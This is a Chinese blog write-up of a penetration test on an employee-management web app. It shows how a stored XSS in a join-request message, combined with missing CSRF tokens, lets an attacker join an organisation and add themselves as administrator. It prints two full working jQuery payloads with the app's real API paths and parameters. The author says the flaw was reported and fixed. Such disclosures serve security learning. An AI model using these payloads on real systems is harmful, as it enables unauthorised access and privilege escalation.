热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

记一次渗透测试中利用存储型XSS添加用户

拿到目标后简单看了下,是一个类似员工管理的东西,用户可以创建group,其他用户可以搜索这个grou

0x00 简单查看

拿到目标后简单看了下,是一个类似员工管理的东西,用户可以创建group,其他用户可以搜索这个group然后申请加入

每个账号都可以注册组织,然后让别人加入,加入的用户有创建者、管理员、默认成员3个角色,管理员拥有的权限就比较大了,可以查看通讯录、添加成员、删除成员等等

0x01 申请加入组织流程分析

走了一遍流程,注册了两个账号,一个是reber,一个是yxk

在加入某组织时会让填验证信息,组织收到申请后同意然后把用户添加到某个分组然后确定

流程大概分4步,用户申请加入group、管理员点击同意、管理员关联用户到分组或成员、确定同意用户的申请

  • 用户reber搜索组织,然后提交验证消息 记一次渗透测试中利用存储型XSS添加用户

  • 用户yxk在消息列表同意reber的申请 记一次渗透测试中利用存储型XSS添加用户

  • yxk给reber分组,点击下一步

  • 最后一步写入备注信息,点击同意按钮最终同意用户加入 记一次渗透测试中利用存储型XSS添加用户

0x02 请求链接分析

经过对上面流程的抓包分析测试,涉及到的有用请求有3个:管理员点击同意链接时的请求、关联到分组或成员的请求、确定同意的请求

  • 用户申请加入某group时发送的数据包如下:
API:/a/cms/org/applyorg
POST:verification=11111&orgId=247173
  • group管理员同意用户申请时链接如下:
API:/a/cms/apply/handle-accept?id=6de027c0-9a4f-490e-a5e2-d1c76cd34a70&oid=247178&name=1760048****

这里链接里有一个id,经过抓包发现可以通过/a/cms/apply/applymsg这个接口直接得到同意申请时的链接

  • 将申请用户关联到分组或成员涉及到如下数据包:
API:/a/cms/apply/do.handle
POST:ID=80b49e8f-4e8c-450f-8bf4-eb809271e779&OID=247178&GID=608863&MID=0&Agree=true&Reason=111

可以看到,上面的请求链接中都没有token,存在CSRF,就猜想能不能构造上述请求从而通过XSS和CSRF来做一些事情

0x03 构造直接添加用户到group的js

由于COOKIE设置了httponly,不能获取到完整的COOKIE,所以这里尝试写js代码,实现将用户直接加入group的功能

看了上面的请求包分析后发现,如果要构造数据包实现我们的想法的话需要有:ID、OID、GID这3个id

分析后发现在/a/cms/apply/applymsg请求的返回包中有同意的链接,链接中有ID

分析后发现在/a/cms/group/treeNode请求的返回包中有OID和GID

于是用于XSS的1.js内容构造如下:

//因为这里要把ajax的返回值return到函数中,需要是同步请求,所以async要设为false

function get_agree_url(){//得到管理员同意用户申请的链接
    var agree_url;
    var href;
    $.ajax({
        type: 'get',
        url: '/a/cms/apply/applymsg',
        async: false,
        success: function(data){
            $(data).find('#accept').each(function(index,element){
                href = $(this).attr('href');
                if (/id=.*?name=1760048****/.test(href)){
                    agree_url = href;
                }
            });
        }
    });
    return agree_url;
}

function get_oid_gid(){//得到oid和gid
    var oid;
    $.ajax({
        type: 'post',
        url: '/a/cms/group/treeNode',
        dataType: 'json',
        async: false,
        data: 'parentId=0',
        success: function(data){
            oid = data[0]['dataObject']['orgId'];
            gid = data[0]['dataObject']['topGroupId'];
        }
    });
    return {
        'oid':oid,
        'gid':gid
    };
}

function attack(){
    var agree_url = get_agree_url();
    var id = /id=(.*?)&/.exec(agree_url)[1];
    var oid_gid = get_oid_gid();
    var oid = oid_gid['oid'];
    var gid = oid_gid['gid'];

    $.get(agree_url);//同意用户加入group

    var step2_url = '/a/cms/apply/handle-accept2?ID='+id+'&OID='+oid+'&Name=176004****'+'&GID='+gid+'&MID=0';
    $.get(step2_url);//关联到分组或成员

    $.post('/a/cms/apply/do.handle',{ID:id,OID:oid,GID:gid,MID:0,Agree:true,Reason:'111'});//最终确认同意,设置备注
}

attack();

0x04 进行XSS攻击添加用户

用户reber尝试加入yxk的组织并提交恶意代码: test 记一次渗透测试中利用存储型XSS添加用户

当用户yxk浏览用户申请列表页面时触发XSS 记一次渗透测试中利用存储型XSS添加用户

回到reber用户,可以看到已经加入了yxk的组织,可以进行一些操作了 记一次渗透测试中利用存储型XSS添加用户

0x05 更进一步,添加为管理员

刚开始分析发现通过上面的过程先添加用户,然后再添加用户为管理员,比较麻烦

后续发现其实不用这么麻烦,直接用另外一个接口发送ajax请求就能直接添加管理员用户

添加管理员的2.js如下:

function get_gid(){
    $.ajax({
        type: 'post',
        url: '/a/cms/group/treeNode',
        dataType: 'json',
        async: false,
        data: 'parentId=0',
        success: function(data){
            gid = data[0]['dataObject']['topGroupId'];
        }
    });
    return gid;
}

var gid = get_gid();

$.post('/a/cms/member/do.save',{memberId: 0,userId: '',mobile: '176004****',name: 'aaa',pinyin: 'aaa',groupId: 608863,group: '默认分组',roleId: 2,duty: '',sex: 0,sort: '10000','TEL;CELL': '','TEL;WORK': '',EMAIL: ''});

提交验证信息为: test

当yxk访问请求的list页面时即可直接添加新用户aaa到group并且是管理员账户: 记一次渗透测试中利用存储型XSS添加用户

好了,打完收工!

PS:漏洞已提交,并早在3个月前修复


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 我们


推荐阅读
  • 深入理解Lucene搜索机制
    本文旨在帮助读者全面掌握Lucene搜索的编写步骤、核心API及其应用。通过详细解析Lucene的基本查询和查询解析器的使用方法,结合架构图和代码示例,带领读者深入了解Lucene搜索的工作流程。 ... [详细]
  • 2018-2019学年第六周《Java数据结构与算法》学习总结
    本文总结了2018-2019学年第六周在《Java数据结构与算法》课程中的学习内容,重点介绍了非线性数据结构——树的相关知识及其应用。 ... [详细]
  • 本文介绍如何使用 Angular 6 的 HttpClient 模块来获取 HTTP 响应头,包括代码示例和常见问题的解决方案。 ... [详细]
  • 黑马头条项目:Vue 文章详情模块与交互功能实现
    本文详细介绍了如何在黑马头条项目中配置文章详情模块的路由、获取和展示文章详情数据,以及实现关注、点赞、不喜欢和评论功能。通过这些步骤,您可以全面了解如何开发一个完整的前端文章详情页面。 ... [详细]
  • KKCMS代码审计初探
    本文主要介绍了KKCMS的安装过程及其基本功能,重点分析了该系统中存在的验证码重用、SQL注入及XSS等安全问题。适合初学者作为入门指南。 ... [详细]
  • 本文详细介绍了跨站脚本攻击(XSS)的基本概念、工作原理,并通过实际案例演示如何构建XSS漏洞的测试环境,以及探讨了XSS攻击的不同形式和防御策略。 ... [详细]
  • 汇总了2023年7月7日最新的网络安全新闻和技术更新,包括最新的漏洞披露、工具发布及安全事件。 ... [详细]
  • 微信小程序开发指南:创建动态电影选座界面
    本文详细介绍如何在微信小程序中实现一个动态且可视化的电影选座组件,提高用户体验。通过合理的布局和交互设计,使用户能够轻松选择心仪的座位。 ... [详细]
  • This pull request introduces the ability to provide comprehensive paragraph configurations directly within the Create Note and Create Paragraph REST endpoints, reducing the need for additional configuration calls. ... [详细]
  • 解决FCKeditor应用主题后上传问题及优化配置
    本文介绍了在Freetextbox收费后选择FCKeditor作为替代方案时遇到的上传问题及其解决方案。通过调整配置文件和调试工具,最终解决了上传失败的问题,并对相关配置进行了优化。 ... [详细]
  • Kubernetes 持久化存储与数据卷详解
    本文深入探讨 Kubernetes 中持久化存储的使用场景、PV/PVC/StorageClass 的基本操作及其实现原理,旨在帮助读者理解如何高效管理容器化应用的数据持久化需求。 ... [详细]
  • 深入理解Vue.js:从入门到精通
    本文详细介绍了Vue.js的基础知识、安装方法、核心概念及实战案例,帮助开发者全面掌握这一流行的前端框架。 ... [详细]
  • Python + Pytest 接口自动化测试中 Token 关联登录的实现方法
    本文将深入探讨 Python 和 Pytest 在接口自动化测试中如何实现 Token 关联登录,内容详尽、逻辑清晰,旨在帮助读者掌握这一关键技能。 ... [详细]
  • Django Token 认证详解与 HTTP 401、403 状态码的区别
    本文详细介绍了如何在 Django 中配置和使用 Token 认证,并解释了 HTTP 401 和 HTTP 403 状态码的区别。通过具体的代码示例,帮助开发者理解认证机制及权限控制。 ... [详细]
  • 本文探讨了XSS攻击的基本原理及其防御方法,重点介绍了如何在前后端实施有效的安全措施来防止XSS攻击。 ... [详细]
author-avatar
乌桥老鹅
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有